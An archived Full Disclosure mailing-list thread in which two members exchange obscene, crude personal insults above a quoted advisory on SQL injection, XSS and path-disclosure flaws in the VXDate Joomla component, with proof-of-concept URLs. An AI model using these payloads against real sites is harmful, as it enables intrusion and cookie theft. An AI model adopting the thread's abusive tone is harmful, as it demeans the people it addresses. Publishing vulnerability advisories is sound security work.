Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Vulnerabilities in VXDate for Joomla
From: julian steward <julian.steward09 () gmail com>
Date: Mon, 22 Mar 2010 09:26:11 -0400

Yup, and that's pretty much how your born.

Welcome in real life cunt.

On Mon, Mar 22, 2010 at 8:53 AM, Anders Klixbull <akl () experian dk> wrote:

 yeah sure..
you junkies are alle the same you suck dicks for cheeseburgers and crack



 ------------------------------
 *From:* julian steward [mailto:julian.steward09 () gmail com]
*Sent:* 22. marts 2010 13:50
*To:* Anders Klixbull
*Cc:* full-disclosure () lists grok org uk

*Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla

  Na only when i need to light up your mom"s crack bang when she's to
fucking high.

On Mon, Mar 22, 2010 at 8:42 AM, Anders Klixbull <akl () experian dk> wrote:

 why does it hurt when you suck lemons?
does your teeth gets fucked up when you smoke cock all day?



 ------------------------------
 *From:* julian steward [mailto:julian.steward09 () gmail com]
*Sent:* 22. marts 2010 13:39
*To:* Anders Klixbull; full-disclosure () lists grok org uk

*Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla

  Yup ur fucking right, as mustdie.

2 cockmunch for the price of one.

Nice.

On Mon, Mar 22, 2010 at 8:36 AM, Anders Klixbull <akl () experian dk> wrote:

  lol look who's talking about being professional
yeah sure because klixbull is such a russian name right?
and oh yeah my email address also ends in .ua
julian its time to stop gobbling that cock and shut the fuck up



 ------------------------------
 *From:* full-disclosure-bounces () lists grok org uk [mailto:
full-disclosure-bounces () lists grok org uk] *On Behalf Of *julian steward
*Sent:* 22. marts 2010 13:34
*To:* full-disclosure () lists grok org uk >> fdisclo

*Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla

   Sucking lemon hurts, I don't see why I would suck one Mr Klixbull

Regarding his disclosure, then he shall stfu about the timeline if he
wanna be "professional".

Yup Klixbull it's time to close your basement door and your mounth, or
are you too from .ua btw ?






On Mon, Mar 22, 2010 at 7:41 AM, Anders Klixbull <akl () experian dk>wrote:

 bohooo stop crying
he can disclose bugs when he feels like it
if you dont like that then go suck a lemon



 ------------------------------
*From:* full-disclosure-bounces () lists grok org uk [mailto:
full-disclosure-bounces () lists grok org uk] *On Behalf Of *julian
steward
*Sent:* 22. marts 2010 00:16
*To:* MustLive; full-disclosure () lists grok org uk
*Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla

  7 month to inform the dev's, what kind of asshole are you ?

Oh wait, were you hacking some n00bs website, with your shitty dork ?

2010/3/17 MustLive <mustlive () websecurity com ua>

Hello Full-Disclosure!

I want to warn you about vulnerabilities in component VXDate for
Joomla.

-----------------------------
Advisory: Vulnerabilities in VXDate for Joomla
-----------------------------
URL: http://websecurity.com.ua/3849/
-----------------------------
Timeline:

10.05.2009 - found the vulnerabilities.
12.01.2010 - announced at my site.
18.01.2010 - informed developers.
13.03.2010 - disclosed at my site.
-----------------------------
Details:

These are Full path disclosure, SQL Injection and Cross-Site Scripting
vulnerabilities.

Full path disclosure:

http://site/index.php?option=com_vxdate&ct=’

http://site/index.php?option=com_vxdate&ct=1&md=details&id=’

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’

SQL Injection:


http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5


http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5

XSS:


http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E


http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Vulnerable are potentially all versions of VXDate.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/







_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]